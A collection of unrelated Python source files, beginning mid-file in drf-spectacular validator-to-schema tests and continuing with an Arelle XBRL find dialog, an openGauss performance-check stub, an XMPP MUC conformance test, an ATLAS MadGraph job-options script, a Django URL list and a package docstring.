validators=[validators.MaxValueValidator(999)], ), validators=[validators.MaxLengthValidator(5)], ) dict_field = serializers.DictField( child=serializers.IntegerField( validators=[validators.MaxValueValidator(999)], ), ) @extend_schema(request=XSerializer, responses=XSerializer) @api_view(['POST']) def view_func(request, format=None): pass # pragma: no cover schema = generate_schema('x', view_function=view_func) properties = schema['components']['schemas']['X']['properties'] assert properties['list_field']['maxItems'] == 5 assert properties['list_field']['items']['maximum'] == 999 assert properties['dict_field']['additionalProperties']['maximum'] == 999 @pytest.mark.parametrize('instance,expected', [ ( serializers.DictField(validators=[validators.MaxLengthValidator(150), validators.MaxLengthValidator(200)]), {'type': 'object', 'additionalProperties': {}, 'maxProperties': 150}, ), ( serializers.DictField(validators=[validators.MinLengthValidator(150), validators.MinLengthValidator(100)]), {'type': 'object', 'additionalProperties': {}, 'minProperties': 150}, ), ( serializers.ListField(max_length=150, validators=[validators.MaxLengthValidator(200)]), {'type': 'array', 'items': {}, 'maxItems': 150}, ), ( serializers.ListField(min_length=150, validators=[validators.MinLengthValidator(100)]), {'type': 'array', 'items': {}, 'minItems': 150}, ), ( serializers.ListField(max_length=200, validators=[validators.MaxLengthValidator(150)]), {'type': 'array', 'items': {}, 'maxItems': 150}, ), ( serializers.ListField(min_length=100, validators=[validators.MinLengthValidator(150)]), {'type': 'array', 'items': {}, 'minItems': 150}, ), ( serializers.ListField(validators=[validators.MaxLengthValidator(150), validators.MaxLengthValidator(200)]), {'type': 'array', 'items': {}, 'maxItems': 150}, ), ( serializers.ListField(validators=[validators.MinLengthValidator(150), validators.MinLengthValidator(100)]), {'type': 'array', 'items': {}, 'minItems': 150}, ), ( serializers.CharField(max_length=150, validators=[validators.MaxLengthValidator(200)]), {'type': 'string', 'maxLength': 150}, ), ( serializers.CharField(min_length=150, validators=[validators.MinLengthValidator(100)]), {'type': 'string', 'minLength': 150}, ), ( serializers.CharField(max_length=200, validators=[validators.MaxLengthValidator(150)]), {'type': 'string', 'maxLength': 150}, ), ( serializers.CharField(min_length=100, validators=[validators.MinLengthValidator(150)]), {'type': 'string', 'minLength': 150}, ), ( serializers.CharField(validators=[validators.MaxLengthValidator(150), validators.MaxLengthValidator(200)]), {'type': 'string', 'maxLength': 150}, ), ( serializers.CharField(validators=[validators.MinLengthValidator(150), validators.MinLengthValidator(100)]), {'type': 'string', 'minLength': 150}, ), ( serializers.IntegerField(max_value=150, validators=[validators.MaxValueValidator(200)]), {'type': 'integer', 'maximum': 150}, ), ( serializers.IntegerField(min_value=150, validators=[validators.MinValueValidator(100)]), {'type': 'integer', 'minimum': 150}, ), ( serializers.IntegerField(max_value=200, validators=[validators.MaxValueValidator(150)]), {'type': 'integer', 'maximum': 150}, ), ( serializers.IntegerField(min_value=100, validators=[validators.MinValueValidator(150)]), {'type': 'integer', 'minimum': 150}, ), ( serializers.IntegerField(validators=[validators.MaxValueValidator(150), validators.MaxValueValidator(200)]), {'type': 'integer', 'maximum': 150}, ), ( serializers.IntegerField(validators=[validators.MinValueValidator(150), validators.MinValueValidator(100)]), {'type': 'integer', 'minimum': 150}, ), ( serializers.DecimalField(max_digits=3, decimal_places=1, validators=[validators.MaxValueValidator(50)]), {'type': 'number', 'format': 'double', 'maximum': 50, 'minimum': -100, 'exclusiveMinimum': True}, ), ( serializers.DecimalField(max_digits=3, decimal_places=1, validators=[validators.MinValueValidator(-50)]), {'type': 'number', 'format': 'double', 'maximum': 100, 'minimum': -50, 'exclusiveMaximum': True}, ), ( serializers.DecimalField(max_digits=3, decimal_places=1, validators=[validators.MaxValueValidator(150)]), {'type': 'number', 'format': 'double', 'maximum': 100, 'minimum': -100, 'exclusiveMinimum': True}, ), ( serializers.DecimalField(max_digits=3, decimal_places=1, validators=[validators.MinValueValidator(-150)]), {'type': 'number', 'format': 'double', 'maximum': 100, 'minimum': -100, 'exclusiveMaximum': True}, ), ( serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.DecimalValidator(max_digits=3, decimal_places=1)], ), { 'type': 'number', 'format': 'double', 'maximum': 100, 'minimum': -100, 'exclusiveMaximum': True, 'exclusiveMinimum': True, }, ), ( serializers.DecimalField( max_digits=3, decimal_places=1, validators=[validators.DecimalValidator(max_digits=4, decimal_places=1)], ), { 'type': 'number', 'format': 'double', 'maximum': 100, 'minimum': -100, 'exclusiveMaximum': True, 'exclusiveMinimum': True, }, ), ( serializers.DecimalField( max_digits=3, decimal_places=1, validators=[validators.DecimalValidator(max_digits=2, decimal_places=1), validators.MaxValueValidator(5)], ), {'type': 'number', 'format': 'double', 'maximum': 5, 'minimum': -10, 'exclusiveMinimum': True}, ), ( serializers.DecimalField( max_digits=3, decimal_places=1, validators=[validators.DecimalValidator(max_digits=2, decimal_places=1), validators.MinValueValidator(-5)], ), {'type': 'number', 'format': 'double', 'maximum': 10, 'minimum': -5, 'exclusiveMaximum': True}, ), ]) @mock.patch('rest_framework.settings.api_settings.COERCE_DECIMAL_TO_STRING', False) def test_validation_constrained(instance, expected): class XSerializer(serializers.Serializer): field = instance @extend_schema(request=XSerializer, responses=XSerializer) @api_view(['POST']) def view_func(request, format=None): pass # pragma: no cover schema = generate_schema('x', view_function=view_func) assert schema['components']['schemas']['X']['properties']['field'] == expected def test_timedelta_in_validator(): class XSerializer(serializers.Serializer): field = serializers.DurationField( validators=[validators.MaxValueValidator(timedelta(seconds=3600))], ) @extend_schema(request=XSerializer, responses=XSerializer) @api_view(['POST']) def view_func(request, format=None): pass # pragma: no cover # `DurationField` values and `timedelta` serialize to `string` type so `maximum` is invalid. schema = generate_schema('x', view_function=view_func) assert 'maximum' not in schema['components']['schemas']['X']['properties']['field'] @pytest.mark.parametrize('pattern,expected', [ (r'\xff', r'\u00ff'), # Unify escape characters. (r'\Ato\Z', r'^to$'), # Switch to ECMA anchors. ]) def test_regex_validator_tweaks(pattern, expected): class XSerializer(serializers.Serializer): field = serializers.CharField(validators=[validators.RegexValidator(pattern)]) @extend_schema(request=XSerializer, responses=XSerializer) @api_view(['POST']) def view_func(request, format=None): pass # pragma: no cover schema = generate_schema('x', view_function=view_func) field = schema['components']['schemas']['X']['properties']['field'] assert field['pattern'] == expected
''' Created on May 1, 2011 @author: Mark V Systems Limited (c) Copyright 2011 Mark V Systems Limited, All rights reserved. ''' from tkinter import Toplevel, N, S, E, W, messagebox try: from tkinter.ttk import Frame, Button except ImportError: from ttk import Frame, Button try: import regex as re except ImportError: import re from arelle.UiUtil import gridHdr, gridCell, gridCombobox, label, checkbox, radiobutton from arelle.CntlrWinTooltip import ToolTip from arelle import ModelDocument, XPathContext, XPathParser, XmlUtil from arelle.ModelDtsObject import ModelConcept from arelle.ModelInstanceObject import ModelFact from arelle.ModelRssItem import ModelRssItem from arelle.ModelFormulaObject import Trace ''' caller checks accepted, if True, caller retrieves url ''' reMetaChars = '[]\\^$.|?*+(){}' newFindOptions = { "direction": "down", "exprType": "text", "all": False, "conceptLabel": False, "conceptName": False, "conceptSubs": False, "conceptPer": False, "conceptBal": False, "factLabel": False, "factName": False, "factValue": False, "factCntx": False, "factUnit": False, "messagesLog": False, "priorExpressions": [], "geometry": None } def find(mainWin): dialog = DialogFind(mainWin, mainWin.config.setdefault("findOptions", newFindOptions)) class DialogFind(Toplevel): def __init__(self, mainWin, options): parent = mainWin.parent super(DialogFind, self).__init__(parent) self.parent = parent self.modelManager = mainWin.modelManager self.modelXbrl = None # set when Find pressed, this blocks next prematurely if options is None: options = newFindOptions self.options = options parentGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)", parent.geometry()) dialogW = int(parentGeometry.group(1)) dialogH = int(parentGeometry.group(2)) dialogX = int(parentGeometry.group(3)) dialogY = int(parentGeometry.group(4)) self.accepted = False self.transient(self.parent) self.title(_("Find")) self.objsList = [] # next may be tried before anything is found frame = Frame(self) # load grid findLabel = gridHdr(frame, 1, 0, "Find:", anchor="w") findLabel.grid(padx=8) self.cbExpr = gridCombobox(frame, 1, 1, values=options["priorExpressions"]) self.cbExpr.grid(columnspan=3, padx=8) ToolTip(self.cbExpr, text=_("Enter expression to find, or select from combo box drop down history list."), wraplength=240) y = 2 # checkbox entries label(frame, 1, y, "Direction:") label(frame, 1, y + 3, "Match:") scopeLabel = label(frame, 2, y, "Scope:") ToolTip(scopeLabel, text=_("Scope for an XBRL document (instance or DTS). " "For an RSS Feed, all properties are matched. "), wraplength=240) rbUp = radiobutton(frame, 1, y+1, "Up", "up", "direction") ToolTip(rbUp, text=_("Find/Next up (on screen) from last to first match."), wraplength=240) rbDn = radiobutton(frame, 1, y+2, "Down", "down", "direction", rbUp.valueVar) ToolTip(rbDn, text=_("Find/Next down (on screen) from first to last match."), wraplength=240) rbText = radiobutton(frame, 1, y+4, "Text (ignore case)", "text", "exprType") ToolTip(rbText, text=_("Expression is a set of characters to match, ignoring case. " "The match may occur anywhere within the scope. "), wraplength=360) rbRegex = radiobutton(frame, 1, y+5, "Regular expression", "regex", "exprType", rbText.valueVar) ToolTip(rbRegex, text=_('A regular expression to match, anywhere in the scope, ignoring case. ' 'For example, "cash" would match cash anywhere in a string (like cash on hand), ' 'whereas "^cash$" would match a full string to only contain cash. ' 'Use regular expression metacharacters, e.g., "." for any single character, ' '".*" for any number of wild characters, .{3} for exactly 3 wild characters. '), wraplength=360) rbXPath = radiobutton(frame, 1, y+6, "XPath 2 expression", "xpath", "exprType", rbText.valueVar) ToolTip(rbXPath, text=_('An XPath 2 expression, where the context element, ".", is a candidate concept QName, if any concept scope is checked, ' 'and a candidate fact item, if any fact scope is checked. The XPath 2 functions do not need an "fn:" prefix (but it is defined). ' 'The XBRL Functions Registry functions do require an "xfi:" prefix. Constructors require an "xs:" prefix. ' 'The expression is considered "matched" for the candidate concept QNames or fact items where the effective boolean value of the expression is "true()". '), wraplength=360) self.optionControls = ( rbUp, rbDn, rbText, rbRegex, rbXPath, #checkbox(frame, 2, y + 1, "All", "all"), checkbox(frame, 2, y + 1, "Concept label", "conceptLabel"), checkbox(frame, 2, y + 2, " name", "conceptName"), checkbox(frame, 2, y + 3, " type", "conceptType"), checkbox(frame, 2, y + 4, " subs group", "conceptSubs"), checkbox(frame, 2, y + 5, " period type", "conceptPer"), checkbox(frame, 2, y + 6, " balance", "conceptBal"), checkbox(frame, 3, y + 1, "Fact label", "factLabel"), checkbox(frame, 3, y + 2, " name", "factName"), checkbox(frame, 3, y + 3, " value", "factValue"), checkbox(frame, 3, y + 4, " context", "factCntx"), checkbox(frame, 3, y + 5, " unit", "factUnit"), checkbox(frame, 3, y + 6, "Messages", "messagesLog"), # Note: if adding to this list keep Finder.FindOptions in sync ) y += 7 resultLabel = gridHdr(frame, 1, y, "Result:", anchor="w") resultLabel.grid(padx=8) self.resultText = gridCell(frame, 1, y + 1) self.resultText.grid(columnspan=3, padx=8) self.resultText.config(state="readonly") y += 2 mainWin.showStatus(None) buttonFrame = Frame(frame) buttonFrame.grid(columnspan=4, sticky=E, padx=8) findButton = Button(buttonFrame, text=_("Find"), width=12, command=self.find) ToolTip(findButton, text=_('Compile (if regular expression or XPath 2), and find first match (if down direction) or last match (if up direction). '), wraplength=240) nextButton = Button(buttonFrame, text=_("Next"), width=12, command=self.next) ToolTip(nextButton, text=_('Advance to the next matched object (in selected direction). '), wraplength=240) closeButton = Button(buttonFrame, text=_("Close"), width=12, command=self.close) ToolTip(closeButton, text=_('Close the find dialog. '), wraplength=240) findButton.grid(row=1, column=1, pady=3) nextButton.grid(row=1, column=2, pady=3) closeButton.grid(row=1, column=3, padx=3) frame.grid(row=0, column=0, sticky=(N,S,E,W)) frame.columnconfigure(1, weight=1) frame.columnconfigure(2, weight=1) frame.columnconfigure(3, weight=1) window = self.winfo_toplevel() window.columnconfigure(0, weight=1) if self.options["geometry"]: self.geometry(self.options["geometry"]) else: self.geometry("+{0}+{1}".format(dialogX+50,dialogY+100)) #self.bind("<Return>", self.ok) #self.bind("<Escape>", self.close) self.protocol("WM_DELETE_WINDOW", self.close) # make this dialog non-modal self.focus_set() #self.grab_set() #self.wait_window(self) def setOptions(self): # set formula options for optionControl in self.optionControls: self.options[optionControl.attr] = optionControl.value def find(self, event=None): self.setOptions() self.accepted = True # self.close() docType = self.modelManager.modelXbrl.modelDocument.type if self.modelManager.modelXbrl else None if self.options["messagesLog"]: if docType == ModelDocument.Type.RSSFEED and self.options["exprType"] == "xpath": messagebox.showerror(_("Find cannot be completed"), _("XPath matching is not available for searching messages, please choose text or regular expression. "), parent=self) return else: if not self.modelManager.modelXbrl or not docType in ( ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.RSSFEED): messagebox.showerror(_("Find cannot be completed"), _("Find requires an opened DTS or RSS Feed"), parent=self.parent) return if docType == ModelDocument.Type.RSSFEED and self.options["exprType"] == "xpath": messagebox.showerror(_("Find cannot be completed"), _("XPath matching is not available for an RSS Feed, please choose text or regular expression. "), parent=self) return self.modelXbrl = self.modelManager.modelXbrl expr = self.cbExpr.value # update find expressions history if expr in self.options["priorExpressions"]: self.options["priorExpressions"].remove(expr) elif len(self.options["priorExpressions"]) > 10: self.options["priorExpressions"] = self.options["priorExpressions"][0:10] self.options["priorExpressions"].insert(0, expr) self.cbExpr.config(values=self.options["priorExpressions"]) self.saveConfig() import threading thread = threading.Thread(target=lambda expr=self.cbExpr.value, logViewLines=self.modelManager.cntlr.logView.lines() if self.options["messagesLog"] else None : self.backgroundFind(expr, logViewLines)) thread.daemon = True thread.start() def backgroundFind(self, expr, logViewLines): exprType = self.options["exprType"] inConceptLabel = self.options["conceptLabel"] inConceptName = self.options["conceptName"] inConceptType = self.options["conceptType"] inConceptSubs = self.options["conceptSubs"] inConceptPer = self.options["conceptPer"] inConceptBal = self.options["conceptBal"] inFactLabel = self.options["factLabel"] inFactName = self.options["factName"] inFactValue = self.options["factValue"] inFactCntx = self.options["factCntx"] inFactUnit = self.options["factUnit"] inMessagesLog = self.options["messagesLog"] nextIsDown = self.options["direction"] == "down" objsFound = set() self.result = "Found " try: if exprType == "text": # escape regex metacharacters pattern = re.compile(''.join( [(('\\' + c) if c in reMetaChars else c) for c in expr]), re.IGNORECASE) isRE = True isXP = False elif exprType == "regex": pattern = re.compile(expr, re.IGNORECASE) isRE = True isXP = False elif exprType == "xpath": isRE = False isXP = True self.resultText.setValue(_("Compiling xpath expression...")) XPathParser.initializeParser(self.modelManager) self.modelManager.showStatus(_("Compiling xpath expression...")) xpProg= XPathParser.parse(self, expr, XPathParser.staticExpressionFunctionContext(), "find expression", Trace.CALL) xpCtx = XPathContext.create(self.modelXbrl, sourceElement=None) else: return # nothing to do if inMessagesLog: for lineNumber, line in enumerate(logViewLines): if pattern.search(line): objsFound.add(lineNumber) elif self.modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED: for rssItem in self.modelXbrl.modelDocument.items: if any(pattern.search(str(value)) for name, value in rssItem.propertyView): objsFound.add(rssItem) else: # DTS search if inConceptLabel or inConceptName or inConceptType or inConceptSubs or inConceptPer or inConceptBal: self.modelManager.cntlr.uiThreadQueue.put((self.resultText.setValue, [_("Matching concepts...")])) self.modelManager.showStatus(_("Matching concepts...")) for conceptName, concepts in self.modelXbrl.nameConcepts.items(): for concept in concepts: if ((isXP and xpCtx.evaluateBooleanValue(xpProg, contextItem=concept.qname)) or (isRE and (inConceptLabel and pattern.search(concept.label())) or (inConceptName and pattern.search(conceptName)) or (inConceptType and pattern.search(str(concept.typeQname))) or (inConceptSubs and pattern.search(str(concept.substitutionGroupQname))) or (inConceptPer and concept.periodType and pattern.search(concept.periodType)) or (inConceptBal and concept.balance and pattern.search(concept.balance)) ) ): objsFound.add(concept) if inFactLabel or inFactName or inFactValue or inFactCntx or inFactUnit: self.modelManager.cntlr.uiThreadQueue.put((self.resultText.setValue, [_("Matching facts...")])) self.modelManager.showStatus(_("Matching facts...")) for fact in self.modelXbrl.facts: if ((isXP and xpCtx.evaluateBooleanValue(xpProg, contextItem=fact)) or (isRE and (inFactName and pattern.search(fact.concept.name) or (inFactLabel and pattern.search(fact.concept.label())) or (inFactValue and pattern.search(fact.value)) or (inFactCntx and pattern.search(XmlUtil.innerText(fact.context.element))) or (inFactUnit and pattern.search(XmlUtil.innerText(fact.unit.element)))) ) ): objsFound.add(fact) except (XPathContext.XPathException, TypeError, ValueError, OverflowError, IndexError, KeyError, re.error) as err: err = _("Find expression error: {0} \n{1}").format( str(err), getattr(err, "sourceErrorIndication",getattr(err, "pattern",""))) self.modelManager.addToLog(err) self.modelManager.cntlr.uiThreadQueue.put((self.resultText.setValue, [err])) self.modelManager.showStatus(_("Completed with errors"), 5000) self.result = err + "\n" numConcepts = 0 numFacts = 0 numRssItems = 0 numMessages = 0 self.objsList = [] for obj in objsFound: if inMessagesLog: numMessages += 1 self.objsList.append( ('m', "{0:06}".format(obj), obj) ) elif isinstance(obj,ModelConcept): numConcepts += 1 self.objsList.append( ('c', obj.localName, obj.objectId()) ) elif isinstance(obj,ModelFact): numFacts += 1 self.objsList.append( ('f', obj.__hash__(), obj.objectId()) ) elif isinstance(obj,ModelRssItem): numRssItems += 1 self.objsList.append( ('r', obj.__hash__(), obj.objectId()) ) self.objsList.sort() if numConcepts: self.result += "{0} concepts".format(numConcepts) if numFacts: self.result += ", " if numFacts: self.result += "{0} facts".format(numFacts) if numRssItems: self.result += "{0} RSS items".format(numRssItems) if numMessages: self.result += "{0} Messages".format(numMessages) if numConcepts + numFacts + numRssItems + numMessages == 0: self.result += "no matches" self.foundIndex = -1 self.modelManager.cntlr.uiThreadQueue.put((self.resultText.setValue, [self.result])) else: self.foundIndex = 0 if nextIsDown else (len(self.objsList) - 1) self.modelManager.cntlr.uiThreadQueue.put((self.next, [])) self.modelManager.showStatus(_("Ready..."), 2000) def next(self): self.setOptions() # refresh options nextIsDown = self.options["direction"] == "down" # check that asme instance applies if not self.options["messagesLog"]: if self.modelXbrl is None: return if self.modelManager.modelXbrl != self.modelXbrl: messagebox.showerror(_("Next cannot be completed"), _("A different DTS is active, than find was initiated with. Please press 'find' to re-search with the current DTS"), parent=self) return lenObjsList = len(self.objsList) if lenObjsList == 0: messagebox.showwarning(_("Next cannot be completed"), _("No matches were found. Please try a different search."), parent=self) return if self.foundIndex < 0 and nextIsDown: self.foundIndex += 1 elif self.foundIndex >= lenObjsList and not nextIsDown: self.foundIndex -= 1 if 0 <= self.foundIndex < lenObjsList: objectFound = self.objsList[self.foundIndex][2] if self.options["messagesLog"]: self.modelManager.cntlr.logView.selectLine(objectFound) else: self.modelManager.modelXbrl.viewModelObject(objectFound) self.resultText.setValue("{0}, selection {1} of {2}".format(self.result, self.foundIndex + 1, len(self.objsList) ) ) self.foundIndex += 1 if nextIsDown else -1 elif nextIsDown: self.resultText.setValue("{0}, selection at end".format(self.result) ) else: self.resultText.setValue("{0}, selection at start".format(self.result) ) def close(self, event=None): self.options["geometry"] = self.geometry() self.saveConfig() self.parent.focus_set() self.destroy() def saveConfig(self): self.modelManager.cntlr.config["findOptions"] = self.options self.modelManager.cntlr.saveConfig()
# -*- coding:utf-8 -*- # Copyright (c) 2020 Huawei Technologies Co.,Ltd. # # openGauss is licensed under Mulan PSL v2. # You can use this software according to the terms # and conditions of the Mulan PSL v2. # You may obtain a copy of Mulan PSL v2 at: # # http://license.coscl.org.cn/MulanPSL2 # # THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, # WITHOUT WARRANTIES OF ANY KIND, # EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, # MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE. # See the Mulan PSL v2 for more details. # ---------------------------------------------------------------------------- import os import sys from gspylib.common.Common import DefaultValue from gspylib.os.gsfile import g_file class CheckperfImpl(): """ Class: check perf impl """ def __init__(self): """ function: constructor """ pass def CheckPMKPerf(self, outputInfo): """ function: check pmk perf """ pass def CheckSSDPerf(self, outputInfo): """ function: check ssd perf input : outputInfo output : NA """ pass def run(self): """ function: the real interface that execute the check method input : NA output: NA """ try: outputInfo = None # check output file if self.opts.outFile != "": self.opts.outFile_tmp = os.path.join( DefaultValue.getTmpDirFromEnv(self.opts.user), (os.path.split(self.opts.outFile)[1] + "_tmp_%s" % os.getpid())) outputInfo = self.setOutFile() else: outputInfo = sys.stdout # check check item for key in self.opts.checkItem: if key == "PMK": # check PMK self.CheckPMKPerf(outputInfo) elif key == "SSD": # check SSD self.CheckSSDPerf(outputInfo) # Follow-up self.closeFile(outputInfo) except Exception as e: # close file handle if outputInfo is out file if self.opts.outFile and outputInfo: outputInfo.flush() outputInfo.close() if os.path.isfile(self.opts.outFile_tmp): g_file.removeFile(self.opts.outFile_tmp) # modify the log file's owner g_file.changeOwner(self.opts.user, self.logger.logFile) self.logger.error(str(e)) sys.exit(1) def setOutFile(self): """ function: set out file input : NA output : NA """ # get directory component of a pathname dirName = os.path.dirname(self.opts.outFile) # judge if directory if not os.path.isdir(dirName): g_file.createDirectory(dirName, True, DefaultValue.KEY_DIRECTORY_MODE) # create output file and modify permission g_file.createFile(self.opts.outFile, True, DefaultValue.KEY_FILE_MODE) g_file.changeOwner(self.opts.user, self.opts.outFile) self.logger.log( "Performing performance check. " "Output the checking result to the file %s." % self.opts.outFile) # write file self.opts.outFile_tmp = os.path.join( DefaultValue.getTmpDirFromEnv(self.opts.user), (os.path.split(self.opts.outFile)[1] + "_tmp_%s" % os.getpid())) if not os.path.isfile(self.opts.outFile_tmp): g_file.createFile(self.opts.outFile_tmp, True, DefaultValue.KEY_FILE_MODE) g_file.changeOwner(self.opts.user, self.opts.outFile_tmp) fp = open(self.opts.outFile_tmp, "w") outputInfo = fp return outputInfo def closeFile(self, fp): """ function: close file input : fp output : NA """ if self.opts.outFile and fp: # close file handle if outputInfo is out file fp.flush() fp.close() g_file.moveFile(self.opts.outFile_tmp, self.opts.outFile) self.logger.log("Performance check is completed.")
from sleekxmpp.exceptions import IqError from sleekxmpp.exceptions import IqTimeout from ConformanceUtils import init_test from ConformanceUtils import print_test_description from JoinMUCBot import JoinTestMUCBot from config import SECOND_BOT from config import SECOND_BOT_JID from config import ROOM_JID #TODO still need to add little more test to see if the set role # is actually effective class EchoBot(JoinTestMUCBot): def __init__(self, jid, password, nick): JoinTestMUCBot.__init__(self, jid, password, nick) self.add_event_handler("got_offline", self.got_offline) def other_participant_online(self, msg): try: self.make_set_role_iq(childtag="NOT-ITEM", role="none").send() print("[fail]") except IqError as e: isCancel = e.iq['error']['type'] == 'cancel' isBadRequest = e.iq['error']['condition'] == 'bad-request' if isCancel and isBadRequest : print("[pass]") else: print("[fail]") except IqTimeout: print("[fail]") self.send_message( mto=ROOM_JID, mbody="disconnect %s" % SECOND_BOT, mtype='groupchat' ) def got_offline(self, presence): # when the second disconnect we disconnect to if presence['from'].bare == SECOND_BOT_JID: self.disconnect() class SecondBot(JoinTestMUCBot): def __init__(self, jid, password, nick): JoinTestMUCBot.__init__(self, jid, password, nick) self.add_event_handler("groupchat_message", self.muc_message) def muc_message(self, msg): if msg['body'] == 'disconnect %s' % SECOND_BOT: self.disconnect() if __name__ == '__main__': print_test_description( "An admin iq with something different than a 'item' tag as child " + "of query should return a bad-request error ..." ) init_test( class_first_bot = EchoBot, class_second_bot = SecondBot )
from MadGraphControl.MadGraphUtils import * import math fcard = open('proc_card_mg5.dat','w') # generate ... QED=0 QCD=3 fcard.write(""" import model DMsimp_s_spin1 -modelname define p = g u c d s b u~ c~ d~ s~ b~ define j = g u c d s b u~ c~ d~ s~ b~ """) if "ee" in runArgs.jobConfig[0]: fcard.write(""" generate p p > Y1 > e+ e- """) elif "mumu" in runArgs.jobConfig[0]: fcard.write(""" generate p p > Y1 > mu+ mu- """) else: raise RuntimeError("No dilepton channel specified.") fcard.write(""" output -f """) fcard.close() beamEnergy=-999 if hasattr(runArgs,'ecmEnergy'): beamEnergy = runArgs.ecmEnergy / 2. else: raise RuntimeError("No center of mass energy found.") process_dir = new_process() #Fetch default LO run_card.dat and set parameters extras = {'lhe_version':'2.0', 'cut_decays' :'F', 'pdlabel' : "'lhapdf'", 'lhaid' : 263000, 'ickkw' : 1, #'xptj' : xptj, 'etaj' : 5 } #from https://twiki.cern.ch/twiki/bin/viewauth/AtlasProtected/MadGraph5aMCatNLOForAtlas#Problems_with_run_card_dat_in_ne build_run_card(run_card_old=get_default_runcard(proc_dir=process_dir),run_card_new='run_card.dat', xqcut=10, nevts=runArgs.maxEvents*2,rand_seed=runArgs.randomSeed,beamEnergy=beamEnergy,extras=extras) print_cards() paramcard = subprocess.Popen(['get_files','-data','MadGraph_param_card_DMsimp_s_spin1.dat']) paramcard.wait() if not os.access('MadGraph_param_card_DMsimp_s_spin1.dat',os.R_OK): print 'ERROR: Could not get param card' elif os.access('param_card.dat',os.R_OK): print 'ERROR: Old param card in the current directory. Dont want to clobber it. Please move it first.' else: oldcard = open('MadGraph_param_card_DMsimp_s_spin1.dat','r') newcard = open('param_card.dat','w') for line in oldcard: if '# gVXd' in line: newcard.write(' 2 %e # gVXd \n'%(gVXd)) elif '# gAXd' in line: newcard.write(' 3 %e # gAXd \n'%(gAXd)) elif '# gVd11' in line: newcard.write(' 4 %e # gVd11 \n'%(gVd11)) elif '# gVu11' in line: newcard.write(' 5 %e # gVu11 \n'%(gVu11)) elif '# gVd22' in line: newcard.write(' 6 %e # gVd22 \n'%(gVd22)) elif '# gVu22' in line: newcard.write(' 7 %e # gVu22 \n'%(gVu22)) elif '# gVd33' in line: newcard.write(' 8 %e # gVd33 \n'%(gVd33)) elif '# gVu33' in line: newcard.write(' 9 %e # gVu33 \n'%(gVu33)) elif '# gVl11' in line: newcard.write(' 10 %e # gVl11 \n'%(gVl11)) elif '# gVl22' in line: newcard.write(' 11 %e # gVl22 \n'%(gVl22)) elif '# gVl33' in line: newcard.write(' 12 %e # gVl33 \n'%(gVl33)) elif '# gAd11' in line: newcard.write(' 13 %e # gAd11 \n'%(gAd11)) elif '# gAu11' in line: newcard.write(' 14 %e # gAu11 \n'%(gAu11)) elif '# gAd22' in line: newcard.write(' 15 %e # gAd22 \n'%(gAd22)) elif '# gAu22' in line: newcard.write(' 16 %e # gAu22 \n'%(gAu22)) elif '# gAd33' in line: newcard.write(' 17 %e # gAd33 \n'%(gAd33)) elif '# gAu33' in line: newcard.write(' 18 %e # gAu33 \n'%(gAu33)) elif '# gAl11' in line: newcard.write(' 19 %e # gAl11 \n'%(gAl11)) elif '# gAl22' in line: newcard.write(' 20 %e # gAl22 \n'%(gAl22)) elif '# gAl33' in line: newcard.write(' 21 %e # gAl33 \n'%(gAl33)) elif ' MY1 ' in line: newcard.write(' 5000001 %e # MY1 \n'%(MY1)) elif 'DECAY 5000001' in line : newcard.write('DECAY 5000001 auto #WY1 \n') elif ' xd : MXd ' in line: newcard.write(' 1000022 %e # xd : MXd \n'%(MXd)) elif ' # MXd ' in line: newcard.write(' 1000022 %e # MXd \n'%(MXd)) else: newcard.write(line) oldcard.close() newcard.close() runName='run_01' generate(run_card_loc='run_card.dat',param_card_loc='param_card.dat',mode=0,njobs=1,run_name=runName,proc_dir=process_dir) arrange_output(run_name=runName,proc_dir=process_dir,outputDS=runName+'._00001.events.tar.gz') #### Shower #evgenConfig.description = "Wimp dmA mediator from DMSimp, ptj>"+str(xptj)+" GeV" evgenConfig.description = "Wimp dmA mediator from DMSimp" evgenConfig.keywords = ["exotic","BSM"] evgenConfig.process = "pp > Y1 > ll" evgenConfig.inputfilecheck = runName runArgs.inputGeneratorFile=runName+'._00001.events.tar.gz' evgenConfig.contact = ["Marie-Helene Genest <[email protected]>"] include("MC15JobOptions/Pythia8_A14_NNPDF23LO_EvtGen_Common.py") include("MC15JobOptions/Pythia8_MadGraph.py") #include("MC15JobOptions/Pythia8_aMcAtNlo.py") #particle data = name antiname spin=2s+1 3xcharge colour mass width (left out, so set to 0: mMin mMax tau0) genSeq.Pythia8.Commands += ["1000022:all = xd xd~ 2 0 0 %d 0" %(MXd), "1000022:isVisible = false"]
from django.urls import path from . import views urlpatterns =[ path('',views.index, name='index'), path('homepage',views.homepage, name='homepage'), path('doneby',views.doneby, name='doneby'), path('link_1',views.link_1, name='link_1'), path('link_2',views.link_2, name='link_2'), path('link_3',views.link_3, name='link_3'), path('link_4',views.link_4, name='link_4'), path('link_5',views.link_5, name='link_5'), path('link_6',views.link_6, name='link_6'), path('link_7',views.link_7, name='link_7'), path('link_8',views.link_8, name='link_8'), path('link_9',views.link_9, name='link_9'), path('link_10',views.link_10, name='link_10'), path('link_11',views.link_11, name='link_11'), path('link_12',views.link_12, name='link_12'), path('link_13',views.link_13, name='link_13'), path('link_14',views.link_14, name='link_14'), path('link_15',views.link_15, name='link_15'), path('your_options', views.your_options, name="your_options"), path('MDU_options', views.MDU_options, name="MDU_options"), path('graph_options', views.graph_options, name="graph_options"), path('PD_results', views.PD_results, name="PD_results"), path('TH_results', views.TH_results, name="TH_results"), path('QC_results', views.QC_results, name="QC_results"), path('VC_results', views.VC_results, name="VC_results"), path('V_results', views.V_results, name="V_results"), path('I_results', views.I_results, name="I_results"), path('cases_results', views.cases_results, name="cases_results") ]
"""Unit test package for zshpower."""
